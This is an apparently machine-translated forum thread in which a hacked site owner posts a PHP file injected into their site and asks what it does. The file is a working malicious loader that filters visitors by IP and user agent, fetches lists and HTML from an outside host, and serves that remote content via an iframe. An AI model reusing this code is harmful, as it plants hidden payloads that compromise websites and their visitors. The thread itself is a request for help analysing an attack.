EDIT: Buen trabajo todo hasta ahora.Me han pirateado, pero no sé cómo o, lo que es más importante, por qué. Código muy extraño inyectado
Acabo de encontrar este ser descarga y encontré en mi historial de bash:
(seguros para ver)
Gracias a todos
acabo noté que el php fuente de mi sitio ha sido editado. No tengo idea de cómo (he cambiado todas mis contraseñas desde entonces) pero lo que realmente me confunde es por qué.
En un par de páginas se colocó un iframe, vinculándolo a un archivo xml.php que se colocó en mi directorio de imágenes (el único directorio accesible por HTACCESS. Este código DEBE haberse colocado manualmente ya que las páginas son bastante complejas y al cabo de auto sin frenar estas páginas habría sido casi imposible.
Ahora lo REALMENTE confuso es el contenido de este archivo XML.php, a partir de lo que puedo ver que no hace nada.
Aquí está el código:
<?php
$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file
if(isset($_GET['ping'])){
echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);
$ip = $exIps[0].".".$exIps[1].".".$exIps[2];
$ips = file_get_contents($urlIps);
if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
die;
}
$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
$userAgent = trim($arrUa[$ua]);
if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
die;
}
}
if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki
echo @file_get_contents($urlHtml);
}else{
?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">
<?php
}
?>
¿Me estoy perdiendo algo, o es este el "truco" más extraño? He hecho mi búsqueda en Google y no puedo encontrar ninguna referencia de que ocurra antes.
¿Qué quiere decir, que no hace nada? Este código hace algunas cosas, algunas páginas usan 'file_get_contents', produce cosas (algunos' echo'es e incluso algunos js para una cookie), hace que el navegador actualice ... – cambraca
Pero las URL que recupera el archivo son como bueno como vacío – Jon
Tengo curiosidad por saber lo que esos comentarios están diciendo ... – Jonah